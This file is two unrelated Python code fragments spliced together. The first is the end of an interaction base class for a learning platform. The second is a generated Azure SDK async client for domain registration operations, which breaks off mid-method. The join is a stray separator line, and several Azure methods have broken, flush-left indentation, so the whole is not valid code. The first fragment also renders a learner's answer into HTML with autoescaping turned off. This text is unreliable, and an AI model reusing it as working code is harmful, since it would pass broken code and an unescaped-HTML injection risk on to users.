    _customization_arg_specs = []
    # Instructions for using this interaction, to be shown to the learner. Only
    # relevant for supplemental interactions.
    instructions = None
    # Whether the answer is long, and would benefit from being summarized.
    needs_summary = False

    @property
    def id(self):
        """The interaction id, i.e. the name of the concrete subclass."""
        return self.__class__.__name__

    @property
    def customization_arg_specs(self):
        """CustomizationArgSpec domain objects built (afresh on every
        access) from the raw ``_customization_arg_specs`` dicts."""
        return [
            domain.CustomizationArgSpec(**cas)
            for cas in self._customization_arg_specs]

    @property
    def dependency_ids(self):
        """A deep copy of the JS dependency ids, safe for callers to mutate."""
        return copy.deepcopy(self._dependency_ids)

    @property
    def rules(self):
        """The rules registered for this interaction's answer type."""
        return rule_domain.get_rules_for_obj_type(self.answer_type)

    def normalize_answer(self, answer):
        """Normalizes a learner's input to this interaction.

        Raises an Exception when the subclass declares no ``answer_type``.
        """
        if self.answer_type:
            return obj_services.Registry.get_object_class_by_type(
                self.answer_type).normalize(answer)

        raise Exception(
            'No answer type initialized for interaction %s' % self.name)

    @property
    def _stats_log_template(self):
        """The template for reader responses in the stats log.

        Falls back to echoing the raw answer when the interaction ships no
        stats_response.html file.
        """
        try:
            return utils.get_file_contents(os.path.join(
                feconf.INTERACTIONS_DIR, self.id, 'stats_response.html'))
        except IOError:
            return '{{answer}}'

    @property
    def html_body(self):
        """The HTML code containing directives and templates for the
        interaction. This contains everything needed to display the interaction
        once the necessary attributes are supplied.

        Each interaction has two directive/template pairs, one for the
        interaction itself and the other for displaying the learner's response
        in a read-only view after it has been submitted.
        """
        js_directives = utils.get_file_contents(os.path.join(
            feconf.INTERACTIONS_DIR, self.id, '%s.js' % self.id))
        html_templates = utils.get_file_contents(os.path.join(
            feconf.INTERACTIONS_DIR, self.id, '%s.html' % self.id))
        return '<script>%s</script>\n%s' % (js_directives, html_templates)

    @property
    def validator_html(self):
        """The HTML code containing validators for the interaction's
        customization_args and submission handler.
        """
        return (
            '<script>%s</script>\n' %
            utils.get_file_contents(os.path.join(
                feconf.INTERACTIONS_DIR, self.id, 'validator.js')))

    def to_dict(self):
        """Gets a dict representing this interaction. Only default values are
        provided.
        """
        result = {
            'id': self.id,
            'name': self.name,
            'description': self.description,
            'display_mode': self.display_mode,
            'is_terminal': self.is_terminal,
            'is_trainable': self.is_trainable,
            'needs_summary': self.needs_summary,
            'customization_arg_specs': [{
                'name': ca_spec.name,
                'description': ca_spec.description,
                'default_value': ca_spec.default_value,
                'schema': ca_spec.schema,
            } for ca_spec in self.customization_arg_specs],
            'instructions': self.instructions,
        }

        # Add information about rule descriptions corresponding to the answer
        # type for this interaction.
        result['rule_descriptions'] = (
            rule_domain.get_description_strings_for_obj_type(
                self.answer_type))

        return result

    def get_rule_by_name(self, rule_name):
        """Gets a rule given its name.

        Raises an Exception when no rule with that name exists for this
        interaction's answer type.
        """
        try:
            return next(
                r for r in self.rules if r.__name__ == rule_name)
        except StopIteration:
            raise Exception('Could not find rule with name %s' % rule_name)

    def get_stats_log_html(self, state_customization_args, answer):
        """Gets the HTML for recording a learner's response in the stats log.

        Returns an HTML string.
        """
        # Use the editor-supplied value for each customization arg, falling
        # back to the spec's default when the editor provided none.
        customization_args = {
            ca_spec.name: (
                state_customization_args[ca_spec.name]['value']
                if ca_spec.name in state_customization_args
                else ca_spec.default_value
            ) for ca_spec in self.customization_arg_specs
        }
        customization_args['answer'] = answer

        return jinja_utils.parse_string(
            self._stats_log_template, customization_args, autoescape=False)
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._domains_operations import build_check_availability_request, build_create_or_update_ownership_identifier_request, build_create_or_update_request_initial, build_delete_ownership_identifier_request, build_delete_request, build_get_control_center_sso_request_request, build_get_ownership_identifier_request, build_get_request, build_list_by_resource_group_request, build_list_ownership_identifiers_request, build_list_recommendations_request, build_list_request, build_renew_request, build_update_ownership_identifier_request, build_update_request
# Generic return type produced by the operation methods in this module.
T = TypeVar('T')
# Signature of the optional ``cls`` callback callers may pass to post-process
# the raw pipeline response: (pipeline_response, deserialized, headers) -> Any.
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class DomainsOperations:
"""DomainsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.web.v2018_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
    @distributed_trace_async
    async def check_availability(
        self,
        identifier: "_models.NameIdentifier",
        **kwargs: Any
    ) -> "_models.DomainAvailablilityCheckResult":
        """Check if a domain is available for registration.

        Check if a domain is available for registration.

        :param identifier: Name of the domain.
        :type identifier: ~azure.mgmt.web.v2018_02_01.models.NameIdentifier
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: DomainAvailablilityCheckResult, or the result of cls(response)
        :rtype: ~azure.mgmt.web.v2018_02_01.models.DomainAvailablilityCheckResult
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.DomainAvailablilityCheckResult"]
        # Standard auth/404/409 status-to-exception mapping; callers may
        # extend or override it via the ``error_map`` kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]

        # Serialize the NameIdentifier model into the JSON request body.
        _json = self._serialize.body(identifier, 'NameIdentifier')

        request = build_check_availability_request(
            subscription_id=self._config.subscription_id,
            content_type=content_type,
            json=_json,
            template_url=self.check_availability.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        # Send the request through the client's policy/transport pipeline.
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            # Raise a mapped exception if the status code matches error_map;
            # otherwise fall through to a generic ARM-formatted error.
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        deserialized = self._deserialize('DomainAvailablilityCheckResult', pipeline_response)

        if cls:
            # Hand the raw pipeline response to the custom ``cls`` callback.
            return cls(pipeline_response, deserialized, {})

        return deserialized

    check_availability.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/checkDomainAvailability'}  # type: ignore
    @distributed_trace
    def list(
        self,
        **kwargs: Any
    ) -> AsyncIterable["_models.DomainCollection"]:
        """Get all domains in a subscription.

        Get all domains in a subscription.

        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either DomainCollection or the result of cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2018_02_01.models.DomainCollection]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.DomainCollection"]
        # Standard auth/404/409 status-to-exception mapping; callers may
        # extend or override it via the ``error_map`` kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        def prepare_request(next_link=None):
            # First page uses the templated operation URL; subsequent pages
            # follow the server-provided ``next_link`` verbatim.
            if not next_link:
                request = build_list_request(
                    subscription_id=self._config.subscription_id,
                    template_url=self.list.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_request(
                    subscription_id=self._config.subscription_id,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        async def extract_data(pipeline_response):
            # Deserialize one page and return (next_link, items) for the pager.
            deserialized = self._deserialize("DomainCollection", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            # Fetch one page, raising a mapped/ARM-formatted error on non-200.
            request = prepare_request(next_link)

            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

            return pipeline_response


        return AsyncItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/domains'}  # type: ignore
    @distributed_trace_async
    async def get_control_center_sso_request(
        self,
        **kwargs: Any
    ) -> "_models.DomainControlCenterSsoRequest":
        """Generate a single sign-on request for the domain management portal.

        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: DomainControlCenterSsoRequest, or the result of cls(response)
        :rtype: ~azure.mgmt.web.v2018_02_01.models.DomainControlCenterSsoRequest
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.DomainControlCenterSsoRequest"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Merge caller-supplied overrides into the status-code -> exception mapping.
        error_map.update(kwargs.pop('error_map', {}))
        request = build_get_control_center_sso_request_request(
            subscription_id=self._config.subscription_id,
            template_url=self.get_control_center_sso_request.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('DomainControlCenterSsoRequest', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get_control_center_sso_request.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/generateSsoRequest'}  # type: ignore
    @distributed_trace
    def list_recommendations(
        self,
        parameters: "_models.DomainRecommendationSearchParameters",
        **kwargs: Any
    ) -> AsyncIterable["_models.NameIdentifierCollection"]:
        """Get domain name recommendations based on keywords.

        Lazy: no HTTP request is issued until the returned pager is iterated.

        :param parameters: Search parameters for domain name recommendations.
        :type parameters: ~azure.mgmt.web.v2018_02_01.models.DomainRecommendationSearchParameters
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either NameIdentifierCollection or the result of
         cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2018_02_01.models.NameIdentifierCollection]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.NameIdentifierCollection"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Merge caller-supplied overrides into the status-code -> exception mapping.
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            # NOTE(review): the search parameters are re-serialized and attached to
            # every page request (including next_link pages, which are forced to GET).
            # This mirrors the generated pager contract for body-based list operations.
            if not next_link:
                _json = self._serialize.body(parameters, 'DomainRecommendationSearchParameters')
                request = build_list_recommendations_request(
                    subscription_id=self._config.subscription_id,
                    content_type=content_type,
                    json=_json,
                    template_url=self.list_recommendations.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                _json = self._serialize.body(parameters, 'DomainRecommendationSearchParameters')
                request = build_list_recommendations_request(
                    subscription_id=self._config.subscription_id,
                    content_type=content_type,
                    json=_json,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request
        async def extract_data(pipeline_response):
            # Return (link-to-next-page-or-None, items-of-this-page).
            deserialized = self._deserialize("NameIdentifierCollection", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)
        async def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
            return pipeline_response
        return AsyncItemPaged(
            get_next, extract_data
        )
    list_recommendations.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/listDomainRecommendations'}  # type: ignore
    @distributed_trace
    def list_by_resource_group(
        self,
        resource_group_name: str,
        **kwargs: Any
    ) -> AsyncIterable["_models.DomainCollection"]:
        """Get all domains in a resource group.

        Lazy: no HTTP request is issued until the returned pager is iterated.

        :param resource_group_name: Name of the resource group to which the resource belongs.
        :type resource_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either DomainCollection or the result of cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2018_02_01.models.DomainCollection]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.DomainCollection"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Merge caller-supplied overrides into the status-code -> exception mapping.
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            # First page uses the operation template; later pages reuse the
            # service-supplied next_link verbatim (forced to GET).
            if not next_link:
                request = build_list_by_resource_group_request(
                    resource_group_name=resource_group_name,
                    subscription_id=self._config.subscription_id,
                    template_url=self.list_by_resource_group.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_by_resource_group_request(
                    resource_group_name=resource_group_name,
                    subscription_id=self._config.subscription_id,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request
        async def extract_data(pipeline_response):
            # Return (link-to-next-page-or-None, items-of-this-page).
            deserialized = self._deserialize("DomainCollection", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)
        async def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
            return pipeline_response
        return AsyncItemPaged(
            get_next, extract_data
        )
    list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains'}  # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
domain_name: str,
**kwargs: Any
) -> "_models.Domain":
"""Get a domain.
Get a domain.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param domain_name: Name of the domain.
:type domain_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Domain, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.Domain
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Domain"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
subscription_id=self._config.subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Domain', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'} # type: ignore
    async def _create_or_update_initial(
        self,
        resource_group_name: str,
        domain_name: str,
        domain: "_models.Domain",
        **kwargs: Any
    ) -> "_models.Domain":
        """Issue the initial create-or-update request for the LRO.

        Internal helper for :meth:`begin_create_or_update`; accepts 200 and 202
        and returns the deserialized Domain from either.
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.Domain"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Merge caller-supplied overrides into the status-code -> exception mapping.
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        _json = self._serialize.body(domain, 'Domain')
        request = build_create_or_update_request_initial(
            resource_group_name=resource_group_name,
            domain_name=domain_name,
            subscription_id=self._config.subscription_id,
            content_type=content_type,
            json=_json,
            template_url=self._create_or_update_initial.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        # Both accepted statuses deserialize the same Domain payload; the branches
        # are kept separate to match the generated per-status handling.
        if response.status_code == 200:
            deserialized = self._deserialize('Domain', pipeline_response)
        if response.status_code == 202:
            deserialized = self._deserialize('Domain', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'}  # type: ignore
    @distributed_trace_async
    async def begin_create_or_update(
        self,
        resource_group_name: str,
        domain_name: str,
        domain: "_models.Domain",
        **kwargs: Any
    ) -> AsyncLROPoller["_models.Domain"]:
        """Creates or updates a domain (long-running operation).

        :param resource_group_name: Name of the resource group to which the resource belongs.
        :type resource_group_name: str
        :param domain_name: Name of the domain.
        :type domain_name: str
        :param domain: Domain registration information.
        :type domain: ~azure.mgmt.web.v2018_02_01.models.Domain
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either Domain or the result of
         cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.web.v2018_02_01.models.Domain]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        polling = kwargs.pop('polling', True)  # type: Union[bool, azure.core.polling.AsyncPollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.Domain"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Only send the initial request when not resuming from a continuation token.
        if cont_token is None:
            raw_result = await self._create_or_update_initial(
                resource_group_name=resource_group_name,
                domain_name=domain_name,
                domain=domain,
                content_type=content_type,
                cls=lambda x,y,z: x,  # keep the raw pipeline response for the poller
                **kwargs
            )
        kwargs.pop('error_map', None)
        def get_long_running_output(pipeline_response):
            # Final deserialization once the LRO completes.
            response = pipeline_response.http_response
            deserialized = self._deserialize('Domain', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'}  # type: ignore
    @distributed_trace_async
    async def delete(
        self,
        resource_group_name: str,
        domain_name: str,
        force_hard_delete_domain: Optional[bool] = None,
        **kwargs: Any
    ) -> None:
        """Delete a domain.

        :param resource_group_name: Name of the resource group to which the resource belongs.
        :type resource_group_name: str
        :param domain_name: Name of the domain.
        :type domain_name: str
        :param force_hard_delete_domain: Specify :code:`<code>true</code>` to delete the domain
         immediately. The default is :code:`<code>false</code>` which deletes the domain after 24 hours.
        :type force_hard_delete_domain: bool
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Merge caller-supplied overrides into the status-code -> exception mapping.
        error_map.update(kwargs.pop('error_map', {}))
        request = build_delete_request(
            resource_group_name=resource_group_name,
            domain_name=domain_name,
            subscription_id=self._config.subscription_id,
            force_hard_delete_domain=force_hard_delete_domain,
            template_url=self.delete.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # 200 and 204 are both success; anything else is mapped to an exception.
        if response.status_code not in [200, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        if cls:
            return cls(pipeline_response, None, {})
    delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'}  # type: ignore
    @distributed_trace_async
    async def update(
        self,
        resource_group_name: str,
        domain_name: str,
        domain: "_models.DomainPatchResource",
        **kwargs: Any
    ) -> "_models.Domain":
        """Creates or updates a domain.

        :param resource_group_name: Name of the resource group to which the resource belongs.
        :type resource_group_name: str
        :param domain_name: Name of the domain.
        :type domain_name: str
        :param domain: Domain registration information.
        :type domain: ~azure.mgmt.web.v2018_02_01.models.DomainPatchResource
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: Domain, or the result of cls(response)
        :rtype: ~azure.mgmt.web.v2018_02_01.models.Domain
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.Domain"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Merge caller-supplied overrides into the status-code -> exception mapping.
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        _json = self._serialize.body(domain, 'DomainPatchResource')
        request = build_update_request(
            resource_group_name=resource_group_name,
            domain_name=domain_name,
            subscription_id=self._config.subscription_id,
            content_type=content_type,
            json=_json,
            template_url=self.update.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        # Both accepted statuses deserialize the same Domain payload; separate
        # branches mirror the generated per-status handling.
        if response.status_code == 200:
            deserialized = self._deserialize('Domain', pipeline_response)
        if response.status_code == 202:
            deserialized = self._deserialize('Domain', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}'}  # type: ignore
    @distributed_trace
    def list_ownership_identifiers(
        self,
        resource_group_name: str,
        domain_name: str,
        **kwargs: Any
    ) -> AsyncIterable["_models.DomainOwnershipIdentifierCollection"]:
        """Lists domain ownership identifiers.

        Lazy: no HTTP request is issued until the returned pager is iterated.

        :param resource_group_name: Name of the resource group to which the resource belongs.
        :type resource_group_name: str
        :param domain_name: Name of domain.
        :type domain_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either DomainOwnershipIdentifierCollection or the result
         of cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2018_02_01.models.DomainOwnershipIdentifierCollection]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.DomainOwnershipIdentifierCollection"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Merge caller-supplied overrides into the status-code -> exception mapping.
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            # First page uses the operation template; later pages reuse the
            # service-supplied next_link verbatim (forced to GET).
            if not next_link:
                request = build_list_ownership_identifiers_request(
                    resource_group_name=resource_group_name,
                    domain_name=domain_name,
                    subscription_id=self._config.subscription_id,
                    template_url=self.list_ownership_identifiers.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_ownership_identifiers_request(
                    resource_group_name=resource_group_name,
                    domain_name=domain_name,
                    subscription_id=self._config.subscription_id,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request
        async def extract_data(pipeline_response):
            # Return (link-to-next-page-or-None, items-of-this-page).
            deserialized = self._deserialize("DomainOwnershipIdentifierCollection", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)
        async def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
            return pipeline_response
        return AsyncItemPaged(
            get_next, extract_data
        )
    list_ownership_identifiers.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DomainRegistration/domains/{domainName}/domainOwnershipIdentifiers'}  # type: ignore
    @distributed_trace_async
    async def get_ownership_identifier(
        self,
        resource_group_name: str,
        domain_name: str,
        name: str,
        **kwargs: Any
    ) -> "_models.DomainOwnershipIdentifier":
        """Get ownership identifier for domain.

        :param resource_group_name: Name of the resource group to which the resource belongs.
        :type resource_group_name: str
        :param domain_name: Name of domain.
        :type domain_name: str
        :param name: Name of identifier.
        :type name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: DomainOwnershipIdentifier, or the result of cls(response)
        :rtype: ~azure.mgmt.web.v2018_02_01.models.DomainOwnershipIdentifier
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.DomainOwnershipIdentifier"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Merge caller-supplied overrides into the status-code -> exception mapping.
        error_map.update(kwargs.pop('error_map', {}))
        request = build_get_ownership_identifier_request(
            resource_group_name=resource_group_name,
            domain_name=domain_name,
            name=name,
            subscription_id=self._config.subscription_id,
            template_url=self.get_ownership_identifier.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        deserialized = self._deserialize('DomainOwnershipIdentifier', pipeline_response)
